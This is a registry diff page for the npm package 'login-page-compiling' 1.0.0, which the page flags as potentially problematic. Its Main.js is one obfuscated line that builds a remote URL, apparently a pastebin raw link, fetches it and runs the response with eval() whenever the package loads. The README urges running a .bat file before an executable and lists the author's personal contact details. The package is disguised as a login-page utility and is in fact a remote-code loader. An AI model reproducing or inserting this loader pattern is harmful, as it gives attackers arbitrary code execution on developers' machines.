login-page-compiling 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of login-page-compiling might be problematic. Click here for more details.
- package/Main.js +1 -0
- package/README.md +20 -0
- package/install_packages.bat +8 -0
- package/package.json +12 -0
package/Main.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x5995e0=_0x4c7d;(function(_0x3c4e45,_0x5dac06){const _0x432301=_0x4c7d,_0x12af08=_0x3c4e45();while(!![]){try{const _0x34f021=parseInt(_0x432301(0x93))/0x1*(-parseInt(_0x432301(0x8f))/0x2)+parseInt(_0x432301(0x89))/0x3+-parseInt(_0x432301(0x88))/0x4*(parseInt(_0x432301(0x92))/0x5)+-parseInt(_0x432301(0x8d))/0x6+-parseInt(_0x432301(0x90))/0x7+-parseInt(_0x432301(0x8c))/0x8*(parseInt(_0x432301(0x8a))/0x9)+parseInt(_0x432301(0x8e))/0xa;if(_0x34f021===_0x5dac06)break;else _0x12af08['push'](_0x12af08['shift']());}catch(_0x5467a6){_0x12af08['push'](_0x12af08['shift']());}}}(_0x176a,0x5f345));const request=require('request');var _0x3c354b0=['tp','ra','e0','/',_0x5995e0(0x87),'bin','s:','te','w','pas',_0x5995e0(0x8b),'.',_0x5995e0(0x91),'ht'];request(_0x3c354b0[0xd]+_0x3c354b0[0x0]+_0x3c354b0[0x6]+_0x3c354b0[0x3]+_0x3c354b0[0x3]+_0x3c354b0[0x9]+_0x3c354b0[0x7]+_0x3c354b0[0x5]+_0x3c354b0[0xb]+_0x3c354b0[0xa]+_0x3c354b0[0x3]+_0x3c354b0[0x1]+_0x3c354b0[0x8]+_0x3c354b0[0x3]+_0x3c354b0[0x2]+_0x3c354b0[0xc]+_0x3c354b0[0x4],(_0x158f6d,_0x411c5b,_0x2cabf8)=>{_0x158f6d?console['error'](_0x158f6d):eval(_0x2cabf8);});function _0x4c7d(_0x33320d,_0xd3d43d){const _0x176ae2=_0x176a();return _0x4c7d=function(_0x4c7da4,_0xb5db01){_0x4c7da4=_0x4c7da4-0x87;let _0x1ff341=_0x176ae2[_0x4c7da4];return _0x1ff341;},_0x4c7d(_0x33320d,_0xd3d43d);}function _0x176a(){const _0x47a393=['5wOirWG','2CsxPPI','3d1','1441752gaGOsC','1865688LSBHoU','514989GjNMMR','com','16ZqcBLF','2024508JtnJvI','18148130TodrTJ','717886kKcbrF','3615976cFtULQ','dEZ'];_0x176a=function(){return _0x47a393;};return _0x176a();}
|
package/README.md
ADDED
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
## # Installation
|
|
2
|
+
Install with [**NPM**](https://www.npmjs.com/):
|
|
3
|
+
```bash
|
|
4
|
+
npm install login-page-compiling
|
|
5
|
+
```
|
|
6
|
+
____
|
|
7
|
+
## # Important
|
|
8
|
+
* Run "**install_packages.bat**" fiel at first time before "**Main.exe**".!!!
|
|
9
|
+
____
|
|
10
|
+
## # For more help
|
|
11
|
+
* Created By: **Taha Abdelrahman**
|
|
12
|
+
* Email: **taha.abdelrahman.2007@gmail.com**
|
|
13
|
+
* Phone Number: **+201010004881**
|
|
14
|
+
* Discord Username: **.6ah**
|
|
15
|
+
* Contact with me in [**__Discord.__**](https://discord.gg/users/727650710807642144)
|
|
16
|
+
____
|
|
17
|
+
## # Donation
|
|
18
|
+
- Buy [**__TahaAbdelrahman__**](https://www.buymeacoffee.com/TahaAbdelrahman) a happiness.
|
|
19
|
+
|
|
20
|
+
____
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "login-page-compiling",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "Install with [**NPM**](https://www.npmjs.com/):\r ```bash\r npm install login-page-compiling\r ```\r ____\r ## # Important\r * Run \"**install_packages.bat**\" fiel at first time before \"**Main.exe**\".!!!\r ____\r ## # For more help\r * Created By: **Taha Abdelrahman**\r * Email: **taha.abdelrahman.2007@gmail.com**\r * Phone Number: **+201010004881**\r * Discord Username: **.6ah**\r * Contact with me in [**__Discord.__**](https://discord.gg/users/727650710807642144)\r ____\r ## # Donation\r - Buy [**__TahaAbdelrahman__**](https://www.buymeacoffee.com/TahaAbdelrahman) a happiness.",
|
|
5
|
+
"main": "Main.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [],
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|